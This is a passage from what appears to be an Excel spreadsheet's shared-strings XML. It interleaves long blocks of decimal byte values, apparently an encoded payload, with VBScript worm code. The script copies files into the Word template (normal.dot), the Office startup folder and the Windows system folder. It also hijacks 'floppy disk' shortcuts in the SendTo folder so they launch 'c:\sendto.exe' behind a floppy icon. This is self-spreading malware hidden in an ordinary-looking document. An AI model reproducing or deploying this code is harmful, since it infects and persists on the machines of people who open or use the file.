26 175 95 211 86 169 115 243 2 99 42 247 133 163 26 172 218 136 26 135 159 143 199 15 121 75 150 94 179 178 175 45 235 72 202 137 21 130 26 151 122 210 222 200 245 111 253 219 0 162 199 31 220 61 218 202 255 200 149 252 17 28 78 225 32 247 210 190 19 24 25 174 175 133 240 40 111 20 148 21 121 54 234 187 1 124 39 50 190 55 5 169 239 51 50 190 151 168 174 85 106 44 221 27 18 205 27 20 44 139 223 223 217 229 231 177 20 185 174 174 245 236 11 233 36 88 188 141 49 148 161 12 101 40 67 25 202 80 134 50 148 161 12 101 40 67 25 202 80 134 50 148 161 12 101 40 67 25 202 80 134 50 148 86 37 207 208 155 64 103 1 238 96 44 134 </t>
  </si>
  <si>
    <t>word.quit</t>
  </si>
  <si>
    <t xml:space="preserve">159 121 131 103 12 95 181 22 243 227 177 53 120 38 218 3 25 203 224 127 60 197 127 2 43 235 162 115 237 98 203 192 60 15 230 114 48 7 210 196 199 125 152 215 83 232 226 123 44 179 77 233 253 11 50 248 23 103 240 175 4 195 181 149 49 171 25 104 16 251 156 119 54 242 253 216 138 187 175 145 199 87 220 103 154 24 187 162 193 63 177 29 240 53 225 138 178 154 241 149 97 51 107 100 173 160 215 176 6 176 213 178 122 182 5 220 181 160 111 4 59 170 127 182 252 250 6 167 71 217 77 170 191 9 193 194 82 239 70 216 64 122 51 237 216 218 40 246 74 213 178 0 237 5 69 181 128 98 53 65 168 27 124 35 98 127 99 114 15 228 100 203 128 37 100 194 116 27 197 78 56 220 131 154 154 210 102 194 41 101 43 0 238 32 179 138 120 83 194 114 192 191 90 236 35 195 60 246 67 137 220 224 226 123 182 220 172 29 236 62 202 109 5 155 10 184 124 23 118 59 235 162 189 172 90 220 145 59 85 25 165 143 59 116 21 122 154 197 110 210 36 253 184 219 178 84 236 165 43 37 92 125 250 35 99 104 241 57 61 181 186 92 253 26 138 70 238 32 231 252 158 5 113 234 137 83 187 197 94 57 191 74 95 32 99 92 237 158 68 228 228 4 38 73 102 106 27 40 49 101 93 146 100 5 187 133 228 105 89 151 213 202 93 40 109 203 187 240 179 103 186 51 128 98 114 225 26 204 216 114 69 11 140 197 184 129 63 244 2 109 112 16 99 37 232 143 27 149 201 192 95 130 190 165 24 181 63 200 190 214 141 122 34 113 173 59 196 242 0 251 90 136 113 147 233 76 106 188 121 49 150 123 25 45 185 87 185 113 121 92 125 14 167 3 224 65 70 119 15 12 66 233 7 179 0 242 210 192 65 198 206 37 52 113 18 124 111 168 196 251 40 149 79 49 243 23 203 167 207 85 61 152 200 10 105 93 137 68 86 183 240 200 230 159 190 100 117 115 15 229 83 24 37 92 117 135 152 206 157 100 245 23 225 62 124 88 235 78 186 208 141 174 171 87 21 183 222 133 106 52 215 255 178 74 164 85 79 39 18 195 236 32 52 128 185 48 86 101 1 160 121 240 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", ntpath, True</t>
  </si>
  <si>
    <t xml:space="preserve">58 51 37 198 15 235 18 215 39 36 18 215 215 37 18 31 39 50 43 189 156 155 210 13 21 90 90 71 161 119 205 193 196 51 195 115 175 175 27 206 250 56 49 60 23 224 224 199 137 79 18 163 195 211 137 143 135 215 38 62 126 230 233 196 245 53 235 192 28 155 222 81 249 53 248 199 231 151 49 155 51 148 161 12 101 40 67 25 106 108 117 241 103 83 46 127 251 241 89 111 142 244 191 19 158 90 110 36 38 211 249 29 138 210 221 215 7 15 41 51 132 251 134 102 220 61 152 113 206 100 168 63 69 245 9 192 173 140 169 119 64 224 145 18 88 231 120 128 2 238 84 192 163 15 240 60 3 220 212 130 199 4 224 71 250 184 54 148 39 158 83 149 123 219 112 135 62 158 85 148 47 228 161 94 152 120 63 29 158 35 132 247 210 225 153 46 184 137 190 6 0 119 182 227 61 106 184 157 29 207 131 154 207 248 89 58 184 255 27 175 54 184 141 175 59 81 26 184 211 117 9 227 231 189 44 5 192 189 142 183 51 190 94 131 95 167 227 199 207 203 25 63 99 11 247 157 225 231 242 184 95 12 247 130 225 62 47 220 245 132 59 154 112 183 210 90 146 109 198 214 137 57 53 110 3 194 157 41 213 98 125 5 207 1 192 125 22 184 171 2 207 136 172 5 184 27 224 207 112 93 4 160 142 241 115 134 144 46 60 45 106 43 227 119 208 53 210 202 11 99 219 104 133 6 207 197 161 117 52 186 135 238 203 0 120 131 26 158 153 131 171 2 95 1 104 101 252 202 9 188 163 97 23 99 116 198 14 126 89 141 247 215 117 136 244 241 238 185 30 134 187 59 24 195 175 226 241 107 104 252 68 29 215 54 240 9 29 159 247 238 99 252 46 59 252 224 29 87 45 186 0 246 210 154 4 163 243 248 240 91 106 188 243 239 126 128 3 12 239 184 231 103 253 225 115 48 214 125 3 11 210 121 82 18 212 74 128 86 133 246 127 170 254 227 86 144 24 69 150 232 78 195 108 179 118 205 2 89 201 94 123 249 37 243 239 218 135 76 206 205 11 103 163 137 231 50 56 103 113 132 237 116 214 209 30 224 1 210 177 231 83 247 95 83 153 217 52 53 205 67 233 104 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t xml:space="preserve">10 41 180 47 226 118 92 165 171 2 41 104 5 41 109 96 245 80 215 120 106 84 19 184 171 161 46 27 198 76 203 198 76 116 205 169 85 180 137 116 202 250 234 75 179 180 229 215 134 241 220 63 187 202 134 30 88 41 251 164 49 242 15 221 49 53 37 255 201 217 64 249 164 137 108 198 204 23 178 158 131 6 49 9 66 223 4 14 13 88 158 38 62 189 69 114 27 194 126 193 221 222 233 11 72 95 144 170 34 26 220 38 164 1 215 134 214 130 109 18 251 57 184 158 52 229 97 79 132 87 205 108 15 134 247 236 10 6 247 60 12 200 185 108 38 17 60 149 244 105 164 255 128 162 159 37 125 45 132 92 131 46 160 101 85 199 188 74 241 20 189 195 236 36 188 56 233 54 210 115 25 46 213 253 152 226 188 70 62 101 208 177 225 138 87 226 96 31 177 238 1 16 185 222 123 26 235 191 8 255 211 105 253 29 90 124 128 60 83 19 52 248 78 58 154 79 130 238 201 3 221 131 196 26 104 161 22 151 105 139 44 75 160 2 167 49 147 141 253 42 97 131 190 182 4 96 62 244 159 171 25 247 105 129 126 53 233 91 100 89 9 188 46 72 135 126 15 164 234 129 142 234 222 12 17 43 96 224 152 153 26 145 175 195 166 207 141 135 21 89 214 131 44 23 101 142 58 122 206 74 34 62 102 135 225 192 212 10 197 231 104 118 176 37 209 208 127 53 211 135 234 19 74 135 97 3 12 155 38 196 73 122 145 197 1 35 24 140 97 173 146 93 154 95 50 127 126 105 171 180 26 237 45 75 181 46 219 82 27 217 156 173 82 145 101 63 228 179 42 51 121 188 20 99 19 153 25 143 147 186 14 126 169 228 150 195 32 90 166 33 215 81 58 130 226 164 7 16 189 110 93 146 236 89 48 213 131 129 189 101 1 47 216 226 213 45 197 194 222 178 184 200 50 23 68 101 150 54 244 158 6 79 251 189 58 20 9 132 98 182 138 130 249 104 210 0 39 226 44 132 68 164 17 56 250 148 4 226 205 108 0 167 40 165 164 138 44 179 217 227 48 59 1 185 185 189 195 70 34 166 152 139 154 108 12 131 127 200 131 231 118 115 111 197 188 203 197 131 159 224 193 172 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">149 123 43 102 100 171 141 93 22 135 71 127 148 144 52 93 230 160 132 254 38 197 255 195 241 249 155 63 165 63 251 127 232 111 98 169 124 158 8 83 80 194 191 62 210 191 36 131 191 61 131 255 146 12 254 139 211 250 99 191 79 244 88 244 254 89 138 127 78 210 255 239 204 22 102 141 77 76 160 9 51 43 50 167 196 44 100 78 141 101 145 57 45 54 129 204 233 177 73 137 157 52 186 244 192 228 233 75 56 111 54 229 142 184 86 253 40 100 218 12 191 239 155 44 184 232 107 153 65 195 60 87 5 52 133 102 89 89 201 135 177 234 96 23 30 168 188 10 103 163 102 246 180 41 27 0 102 151 62 19 27 102 115 110 110 16 51 88 24 231 55 6 195 146 79 90 43 149 73 77 65 169 108 101 41 76 182 3 209 144 59 234 93 219 29 12 183 59 182 4 195 157 110 127 147 167 51 228 119 71 61 14 23 4 72 139 36 91 139 13 38 224 29 145 160 163 45 24 218 223 225 243 123 36 91 219 170 150 0 33 59 218 131 81 91 137 196 83 41 145 154 194 93 158 42 124 79 171 67 95 31 10 249 125 109 110 220 58 233 104 140 186 195 209 174 144 154 54 37 83 230 216 231 239 180 149 116 238 239 8 250 219 61 225 146 40 36 115 11 127 248 32 194 238 235 242 69 97 190 86 219 33 41 35 126 164 216 183 216 17 112 119 122 214 218 52 41 72 81 175 39 80 77 136 91 130 81 9 137 64 2 60 251 124 145 104 164 120 156 100 44 150 154 32 149 245 153 138 44 104 29 181 80 54 206 137 57 108 178 25 198 229 14 144 22 31 189 144 197 233 117 49 184 59 160 7 87 94 31 150 64 95 19 124 240 210 94 27 200 225 157 208 171 75 116 12 45 190 94 156 74 143 84 89 120 204 38 146 210 238 241 123 162 158 116 196 148 35 199 85 206 56 112 175 233 120 121 110 226 143 101 221 42 91 181 236 92 236 136 184 247 122 224 9 35 10 115 45 5 197 209 232 245 120 128 155 54 189 200 2 114 117 208 223 213 25 136 20 47 67 107 104 191 148 49 209 177 19 128 167 182 110 71 67 87 64 178 45 172 174 175 107 116 213 84 47 148 110 111 147 254 167 </t>
  </si>
  <si>
    <t>set fold=fso.getfolder(w.SpecialFolders("SendTo"))</t>
  </si>
  <si>
    <t xml:space="preserve">189 171 15 106 226 136 226 151 128 18 5 197 239 47 164 46 17 36 145 24 9 248 173 1 52 160 162 129 162 1 17 77 165 71 114 33 167 201 5 239 14 2 78 109 11 182 106 71 180 142 86 90 63 58 173 245 3 191 58 214 106 171 237 212 58 109 167 173 51 118 172 99 59 163 78 213 58 106 71 170 50 142 86 59 227 119 223 238 94 2 145 20 253 195 191 58 13 147 187 219 183 187 183 111 223 123 191 183 111 247 194 30 43 203 34 95 134 82 36 148 226 70 32 3 137 147 93 30 182 220 200 85 115 32 242 84 42 245 1 138 157 155 77 72 246 181 24 140 145 160 4 166 185 172 105 92 251 182 228 105 177 37 24 221 161 13 220 19 167 217 33 114 128 10 95 25 222 222 89 167 37 118 201 182 8 89 171 127 1 107 193 35 44 48 22 178 98 57 39 99 105 155 181 132 73 193 41 251 8 143 145 244 97 14 46 148 235 240 9 86 31 173 107 214 130 72 60 158 244 52 163 211 227 49 140 210 194 156 217 5 61 224 88 135 27 185 92 248 205 137 24 23 196 148 165 246 37 51 76 66 195 254 93 50 241 161 81 115 64 147 208 251 108 98 91 137 180 93 69 114 33 74 167 58 3 56 128 12 77 45 102 237 33 187 182 202 96 212 216 104 249 224 222 181 45 243 185 192 110 210 116 7 107 29 148 209 135 24 127 58 164 205 0 129 132 249 197 197 238 229 218 86 230 175 35 179 254 40 188 131 177 15 91 180 131 45 35 198 143 89 44 227 5 86 172 65 172 195 193 73 18 242 139 188 204 33 86 66 131 77 26 152 73 227 127 25 135 203 190 112 233 54 91 38 213 200 156 206 203 59 117 238 42 131 96 240 14 19 244 250 206 48 117 174 148 161 136 193 224 112 247 104 141 174 64 35 241 97 33 199 85 59 56 143 81 174 150 181 110 172 5 145 43 167 45 107 167 78 207 41 41 181 20 205 156 153 147 95 88 90 100 203 153 105 183 249 92 178 159 21 57 123 30 239 16 125 18 164 236 197 188 224 244 249 37 187 165 82 20 57 65 158 197 137 18 232 222 14 186 180 231 42 27 227 83 117 105 249 214 201 57 74 83 10 131 207 169 45 150 222 124 204 </t>
  </si>
  <si>
    <t>for each ff in fold.files</t>
  </si>
  <si>
    <t xml:space="preserve">179 90 83 208 132 131 198 148 70 161 129 45 211 140 101 5 38 79 189 183 206 111 180 85 112 14 158 245 76 38 105 64 186 13 234 23 250 180 122 125 58 163 81 147 106 0 1 179 223 104 33 144 178 185 125 162 236 168 148 117 196 202 43 130 78 20 142 46 23 1 166 94 3 118 208 137 174 222 180 241 202 33 210 50 32 133 23 137 178 160 176 100 210 211 91 142 121 86 191 210 182 191 128 93 129 171 150 33 240 132 76 196 187 96 252 45 247 1 76 184 52 240 41 92 218 56 13 197 53 246 152 19 176 39 112 87 193 64 27 14 110 97 252 30 128 31 96 104 64 224 57 103 177 158 74 78 77 23 228 4 179 41 150 97 188 102 94 144 100 17 219 175 22 105 245 16 118 56 125 200 239 198 221 247 102 164 2 91 30 159 175 162 3 46 237 77 49 117 111 41 47 24 148 26 237 140 31 116 252 238 251 164 95 128 62 56 205 184 211 113 248 13 13 124 21 40 9 217 42 203 16 117 129 10 70 116 250 174 12 147 205 123 17 120 169 137 18 194 56 27 193 48 54 142 140 187 208 119 170 220 23 21 127 41 57 68 190 66 230 133 114 234 198 106 36 153 243 82 95 170 213 39 209 106 254 54 149 252 180 150 145 184 71 173 30 100 159 3 178 207 117 65 167 243 65 23 25 225 181 9 57 34 235 72 79 67 195 115 208 240 18 52 220 138 85 138 191 192 184 17 190 45 58 53 183 119 3 249 233 245 251 180 145 172 34 155 40 202 41 200 12 166 77 10 205 76 196 30 184 7 4 152 62 1 113 120 3 13 36 114 82 165 151 67 216 188 18 24 166 245 200 157 205 75 16 139 213 76 244 112 162 44 129 120 38 179 30 240 109 237 151 193 140 161 176 42 15 65 202 104 176 20 37 222 130 74 126 99 8 96 192 74 3 97 160 164 165 216 9 122 25 237 144 208 0 139 84 80 66 172 192 29 105 12 213 95 65 43 209 169 210 84 48 198 123 90 72 25 44 72 58 212 163 117 140 2 3 22 113 242 163 218 244 242 169 81 15 29 219 3 216 101 77 143 153 153 16 91 95 141 162 225 188 29 124 204 171 16 18 221 129 17 162 47 0 48 29 136 69 96 108 155 </t>
  </si>
  <si>
    <r>
      <t>if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="134"/>
      </rPr>
      <t>软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>")&gt;0 then</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">33 24 253 14 32 54 22 224 56 23 202 254 8 231 63 225 188 7 98 234 227 0 252 183 1 118 251 160 238 87 192 230 249 206 116 193 156 46 172 101 133 44 172 69 171 7 6 103 55 56 44 63 216 143 97 214 2 60 227 6 195 61 147 240 226 58 94 123 138 129 163 147 137 37 215 221 201 252 176 27 240 248 96 231 205 147 121 101 5 153 165 132 62 148 208 83 200 177 142 80 94 111 245 178 137 36 60 15 97 226 85 181 120 58 16 25 88 150 95 66 74 191 65 142 121 76 67 36 94 216 179 195 212 0 255 52 177 16 206 54 72 77 101 10 96 8 182 146 141 232 241 15 218 166 41 219 187 143 36 155 216 227 232 180 128 177 64 62 34 11 237 170 200 126 204 89 230 80 68 108 38 163 86 129 131 94 31 157 174 113 2 47 81 204 108 181 154 172 175 49 100 217 156 35 91 239 7 94 85 241 124 62 170 167 228 191 19 105 100 166 22 32 43 43 113 226 52 240 46 35 77 169 169 168 192 98 69 35 185 39 74 70 50 105 204 22 213 210 136 234 77 220 234 99 249 189 102 116 91 122 237 198 184 138 67 67 163 133 1 245 43 139 209 214 95 234 127 250 161 228 61 102 0 58 220 20 153 243 249 90 235 148 168 169 189 101 75 157 105 190 107 103 180 253 139 147 217 167 50 106 187 205 251 166 49 245 203 170 43 241 230 198 193 61 123 46 184 249 120 221 141 194 93 87 11 103 60 24 164 106 202 216 174 46 223 88 157 87 21 139 62 141 223 86 181 104 221 239 137 239 38 44 59 177 194 221 97 181 241 128 225 242 192 234 15 150 229 54 212 53 119 106 138 56 154 116 96 222 45 33 102 125 157 189 54 127 82 74 65 191 188 250 5 98 111 199 229 235 93 99 106 74 31 94 243 31 190 127 57 225 248 234 197 23 27 189 230 165 19 234 50 222 156 176 100 79 255 199 99 154 119 111 21 142 126 188 67 99 190 119 116 203 249 229 29 151 103 86 44 185 158 220 117 71 76 241 254 85 189 78 118 121 56 233 214 138 91 55 18 51 115 143 91 142 172 121 132 198 14 137 175 139 177 12 168 173 207 178 52 233 14 13 234 178 198 118 66 213 196 95 95 181 </t>
  </si>
  <si>
    <r>
      <t>set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="134"/>
      </rPr>
      <t>.CreateShortcut(fold.path &amp; "\" &amp; ff.name)</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">164 244 102 220 197 56 161 225 116 150 49 43 118 246 162 149 183 251 53 143 250 251 165 154 13 251 183 205 185 244 217 222 95 247 173 121 101 200 222 27 103 248 228 38 103 202 71 15 155 18 165 211 7 110 254 246 218 194 41 113 71 220 142 83 183 227 186 244 248 217 49 236 66 135 228 91 155 238 12 57 250 194 194 105 7 175 221 61 236 73 182 254 181 253 186 243 238 157 239 71 88 175 230 52 12 31 63 235 253 183 46 85 36 29 219 88 50 99 250 149 181 159 204 153 107 189 34 20 237 74 95 231 78 200 157 191 187 100 222 136 162 111 207 236 232 49 229 235 81 27 14 247 185 207 78 111 74 110 174 189 61 233 222 217 71 29 7 255 145 55 250 229 115 205 231 26 31 49 179 163 217 181 255 63 175 253 207 127 54 195 100 160 19 227 84 94 213 163 6 31 50 91 249 89 231 133 204 192 89 197 20 65 142 134 89 172 44 194 100 245 140 133 120 73 77 210 184 214 135 29 91 210 106 248 187 48 168 119 48 29 65 30 113 210 124 70 221 53 232 139 233 35 80 141 186 155 114 29 79 29 140 42 150 208 84 97 104 52 74 27 31 66 139 8 83 46 50 12 173 67 24 90 199 48 180 168 48 52 77 24 90 167 48 188 116 14 67 139 126 146 246 15 155 162 190 16 88 36 0 128 67 75 236 61 11 108 28 199 117 179 123 191 229 241 142 60 146 71 241 68 241 179 164 40 234 72 253 142 20 45 159 28 73 62 82 148 124 180 101 153 142 21 155 141 29 248 232 144 6 5 211 212 89 162 156 179 173 20 231 68 9 104 192 13 216 64 104 207 169 139 50 128 209 178 109 96 80 110 106 51 128 139 48 128 11 176 129 129 92 218 162 38 2 3 102 218 0 101 138 6 165 211 166 33 106 135 215 153 183 111 246 199 217 229 81 138 219 160 232 17 199 55 239 205 239 205 155 55 111 102 222 206 236 81 90 72 80 94 88 144 174 74 64 171 22 208 152 100 236 180 26 1 173 86 64 171 19 208 162 64 179 242 87 47 160 237 18 228 109 16 208 98 130 188 187 5 233 26 5 180 61 2 90 147 128 214 44 160 181 8 104 173 54 154 31 30 114 91 31 37 210 200 </t>
  </si>
  <si>
    <r>
      <t>lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="134"/>
      </rPr>
      <t>TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">205 93 164 33 68 204 91 208 22 15 25 144 175 147 95 65 47 203 84 30 125 240 224 254 8 104 106 53 206 142 236 113 40 123 65 235 110 210 16 224 94 194 125 236 153 171 188 36 47 53 75 3 158 127 132 2 36 40 224 14 40 96 47 168 53 175 190 61 5 195 162 20 214 238 30 156 102 197 246 191 4 153 216 184 218 5 143 209 253 84 122 30 172 85 194 90 169 206 151 60 164 255 117 72 234 129 242 143 65 210 22 24 14 230 230 209 161 80 82 180 242 251 191 2 233 189 144 254 78 72 223 133 195 213 40 154 14 147 82 157 93 28 3 82 250 69 150 213 7 89 79 67 214 131 48 162 204 85 209 209 84 162 146 12 19 203 70 166 153 74 178 38 207 114 251 33 247 32 228 110 132 177 103 174 152 226 191 242 146 1 202 24 75 27 128 180 236 40 3 195 20 192 146 136 85 128 108 170 16 11 2 22 65 172 18 176 123 16 11 65 190 52 98 97 136 227 165 84 1 118 28 177 106 75 153 17 192 124 136 213 0 54 132 88 173 165 148 58 75 41 81 168 239 20 98 245 128 249 17 219 5 41 155 17 107 0 108 55 98 49 72 73 16 219 13 113 7 16 107 4 236 32 98 123 0 59 132 88 19 96 135 17 107 6 108 15 98 45 128 53 33 214 10 24 59 210 241 30 237 129 235 180 105 147 242 41 210 79 213 242 0 60 255 59 69 107 168 218 209 31 27 95 170 96 204 181 9 104 237 2 155 176 87 144 174 67 144 110 159 128 214 41 160 237 23 208 226 2 90 151 128 214 45 224 229 128 128 118 80 64 59 36 40 239 176 128 118 68 64 75 8 104 61 2 90 175 160 222 163 2 90 159 128 118 135 128 118 76 64 187 83 64 75 10 104 199 5 180 187 4 180 79 9 104 39 4 180 147 2 218 41 129 12 238 182 209 152 86 171 160 213 61 168 227 109 128 29 65 172 29 198 20 31 153 123 33 174 17 177 14 136 171 71 108 31 96 109 136 117 2 118 23 98 251 1 251 20 98 113 192 78 32 214 5 216 89 196 186 161 134 26 196 14 0 38 33 118 16 48 47 98 135 32 159 140 216 97 192 2 136 29 1 172 3 177 4 96 237 136 245 0 22 </t>
  </si>
  <si>
    <t>lnk.IconLocation="shell32.dll,6"</t>
  </si>
  <si>
    <t xml:space="preserve">69 172 23 202 84 16 59 10 113 123 17 235 131 184 90 196 238 0 172 14 177 99 128 117 35 118 39 96 113 196 146 128 237 71 236 56 96 157 136 221 5 88 23 98 159 2 172 23 177 19 128 85 32 118 18 176 1 196 78 1 103 97 196 238 6 108 31 218 161 20 243 175 201 59 179 59 34 59 148 18 232 75 191 128 54 32 160 157 22 232 223 160 128 118 70 64 59 43 160 221 35 160 165 5 180 33 1 47 247 10 210 221 39 160 157 19 228 189 95 144 238 188 128 246 128 32 239 176 32 221 131 130 241 150 130 222 107 197 190 236 7 76 69 108 192 50 71 159 6 29 8 34 54 8 88 8 177 51 128 85 34 118 22 48 15 98 247 0 86 141 88 26 176 22 196 134 160 134 20 98 247 66 92 3 98 247 1 22 67 236 28 164 220 133 216 253 22 173 62 111 209 234 7 32 101 63 98 195 16 119 20 177 7 33 238 36 232 106 156 140 209 1 123 65 218 94 31 79 201 181 228 45 63 91 227 164 76 107 163 102 216 19 193 146 2 22 60 119 19 223 191 209 36 126 88 135 5 255 127 95 250 127 244 115 1 159 219 221 234 57 76 186 248 147 74 248 91 120 229 158 191 100 3 114 165 134 159 191 124 156 60 68 55 224 195 20 246 222 2 255 108 33 124 43 247 191 226 242 214 250 143 222 90 253 82 37 158 147 46 183 254 10 60 159 203 62 47 92 235 185 173 254 243 163 252 119 210 126 102 174 126 249 176 225 70 149 93 206 127 111 98 223 50 88 238 249 111 102 214 26 224 168 10 129 13 68 163 237 252 119 11 158 255 86 203 56 255 205 166 243 79 234 252 55 107 147 253 252 247 25 164 187 157 255 230 231 219 135 5 231 191 89 28 251 62 226 112 254 251 115 152 198 124 254 155 225 252 252 247 184 233 252 247 4 194 79 242 115 249 51 121 212 138 60 126 185 134 84 152 180 149 233 71 166 157 107 140 4 218 49 228 51 199 251 201 143 31 213 240 155 56 89 124 15 11 120 5 225 79 251 140 252 236 255 69 76 255 10 150 243 187 136 51 174 120 217 10 213 27 214 139 63 69 124 20 75 168 241 27 105 249 71 34 127 6 99 218 147 169 144 180 83 </t>
  </si>
  <si>
    <t>lnk.save</t>
  </si>
  <si>
    <t xml:space="preserve">222 255 147 247 40 36 242 71 164 1 235 125 27 30 179 64 208 119 31 29 146 237 222 92 169 45 204 180 255 193 92 233 209 233 146 162 176 159 37 232 144 72 152 45 243 27 167 75 164 219 155 45 209 68 62 15 233 240 146 112 145 142 66 37 87 10 39 168 84 39 179 165 95 176 98 255 161 49 87 106 250 109 58 14 188 211 165 95 176 151 100 236 207 148 246 109 205 18 103 46 19 47 201 149 104 161 178 54 42 217 184 110 162 252 116 224 3 162 90 248 31 50 217 131 168 126 42 158 208 156 30 50 77 191 1 200 156 100 58 204 174 244 208 177 165 217 22 249 196 9 61 196 126 153 85 172 63 17 93 47 100 203 201 252 65 224 166 131 72 18 175 209 67 7 65 65 110 218 114 126 191 133 63 223 153 66 6 78 76 235 245 230 244 208 53 82 174 254 6 72 162 157 63 238 241 130 245 224 58 150 109 55 167 147 201 15 53 159 48 249 45 244 28 61 135 240 56 194 26 132 47 157 66 125 198 227 251 199 209 61 253 98 202 125 28 252 176 82 131 31 34 172 192 174 104 67 56 138 244 231 16 31 10 107 240 25 14 79 106 176 31 159 247 13 33 206 199 31 31 103 21 218 143 173 147 30 132 223 68 248 61 132 63 214 224 99 212 124 37 168 137 221 75 205 14 93 60 118 155 8 125 68 138 32 161 7 8 236 7 219 183 144 182 164 122 130 170 205 150 84 99 68 170 181 144 122 168 105 126 82 68 28 223 90 222 81 59 105 148 114 104 35 221 65 205 190 141 255 94 35 77 2 139 239 179 167 233 17 54 200 202 85 47 253 59 126 171 173 28 163 156 217 210 29 167 41 69 165 117 32 233 73 252 235 166 60 222 73 217 233 133 239 24 13 31 119 168 84 32 48 107 51 159 44 43 91 178 140 222 101 58 240 129 172 91 223 62 92 67 36 113 126 149 111 99 45 179 249 125 137 174 70 73 94 49 246 27 249 10 189 166 246 23 169 217 164 163 52 195 108 63 13 159 160 171 214 28 134 217 70 112 81 15 203 100 9 195 9 58 247 46 87 104 225 40 109 192 50 210 59 168 60 87 49 252 105 242 60 41 84 106 225 12 157 243 51 152 158 185 85 139 212 </t>
  </si>
  <si>
    <t>goto e2</t>
  </si>
  <si>
    <t xml:space="preserve">12 122 177 252 9 191 157 159 16 240 3 15 140 104 26 47 53 193 249 0 175 235 16 72 132 243 22 35 6 111 42 134 253 212 38 41 30 45 28 162 235 162 136 196 235 173 102 82 128 240 48 21 124 178 146 167 169 131 27 93 60 239 140 169 252 89 83 249 195 196 72 95 192 112 140 174 159 230 137 209 174 37 83 222 17 61 236 35 69 12 179 135 56 89 228 167 138 206 30 25 201 104 227 138 169 174 85 83 120 205 84 239 156 100 212 155 84 180 112 55 121 150 204 42 6 255 19 138 193 67 86 49 241 160 152 234 82 140 242 243 166 240 176 98 200 106 17 94 69 165 192 234 117 89 49 248 143 201 6 255 69 201 200 187 32 25 117 69 2 6 159 138 137 31 213 84 87 220 92 102 192 40 51 30 48 210 196 60 6 15 235 40 135 94 186 54 76 5 12 153 67 36 166 223 48 245 133 246 42 45 67 175 184 190 197 29 244 63 137 237 98 171 234 66 152 151 67 200 98 152 151 79 229 96 10 23 49 204 86 149 170 41 253 42 134 217 244 183 30 50 209 77 225 117 83 57 43 33 99 220 45 202 134 172 230 100 163 93 243 24 102 46 138 100 80 11 55 209 181 118 46 200 199 197 221 164 16 228 242 188 155 44 4 141 190 206 6 141 114 38 76 225 140 158 166 146 140 4 13 57 47 5 141 49 78 130 198 24 79 120 140 49 158 149 141 49 190 97 26 227 235 38 253 73 123 196 242 79 209 188 218 24 15 145 44 150 201 214 21 57 15 111 35 149 173 79 11 179 165 192 44 202 135 21 157 13 25 118 163 96 43 31 86 139 146 66 87 25 159 83 127 254 78 210 100 255 126 207 155 1 120 13 247 94 124 23 126 137 230 27 198 220 105 216 55 189 41 183 17 191 164 146 40 64 31 121 21 210 61 133 249 174 17 99 117 172 64 250 203 242 91 132 165 98 7 251 212 147 42 185 38 171 228 186 204 40 210 46 137 120 23 104 83 95 166 187 164 27 20 198 168 153 59 70 219 51 76 191 215 31 52 94 81 246 236 213 133 151 88 145 248 226 55 242 38 163 75 108 48 69 105 5 175 225 51 50 254 97 103 208 181 159 87 10 209 248 115 164 32 53 147 247 </t>
  </si>
  <si>
    <t>end if</t>
  </si>
  <si>
    <t xml:space="preserve">241 181 90 112 237 147 29 156 133 4 23 77 105 25 251 147 218 149 6 118 190 75 251 209 38 83 90 22 191 108 43 223 92 86 123 175 65 127 194 68 175 116 40 79 53 133 199 105 217 239 219 120 187 68 121 87 164 143 129 111 85 192 251 164 141 247 115 146 51 111 116 75 104 106 135 56 60 76 203 200 73 118 30 196 105 47 82 222 74 165 215 32 117 143 128 55 231 48 95 102 151 74 131 208 103 202 219 95 125 238 195 155 21 3 127 124 238 230 71 109 31 174 253 83 247 201 143 62 254 175 185 137 200 159 80 203 125 224 232 51 127 41 58 121 245 135 207 255 249 227 103 254 253 107 253 191 255 131 170 223 121 35 219 189 18 65 23 130 15 93 7 38 69 71 140 77 93 138 61 155 189 106 141 177 251 207 240 2 136 174 86 172 40 6 63 64 124 25 83 176 227 11 255 59 55 231 217 219 198 100 242 80 68 227 83 34 15 133 244 208 13 45 20 36 25 26 234 148 153 233 79 208 80 11 44 142 78 181 243 150 53 158 43 51 164 124 114 57 96 252 179 46 125 140 154 208 159 48 167 11 237 70 182 228 56 75 191 255 89 109 244 248 179 87 111 156 98 221 176 151 34 51 48 254 121 151 24 29 149 130 206 249 90 239 31 188 125 173 183 107 240 79 239 255 210 208 43 247 60 243 238 110 193 149 112 187 62 245 249 126 20 174 152 249 187 115 223 25 244 121 143 252 243 135 223 45 83 159 236 217 236 85 151 175 79 131 59 214 162 177 95 179 222 165 36 166 79 143 158 211 181 40 98 215 39 182 227 237 208 247 190 19 122 40 162 135 162 122 40 166 135 154 244 144 170 135 66 122 40 174 135 14 234 161 4 134 12 77 149 79 56 237 255 119 164 149 162 208 13 222 202 69 90 219 146 172 149 60 169 215 145 213 67 226 253 63 15 105 165 240 94 149 200 121 186 46 120 1 142 172 38 232 58 32 65 87 227 108 111 121 8 41 9 75 232 244 22 154 249 175 143 110 44 191 8 74 200 122 72 146 230 233 4 41 231 55 209 250 104 111 104 99 62 88 66 172 62 41 130 222 78 230 209 172 172 81 101 141 230 201 16 34 126 133 222 53 58 183 51 72 247 10 </t>
  </si>
  <si>
    <t>next</t>
  </si>
  <si>
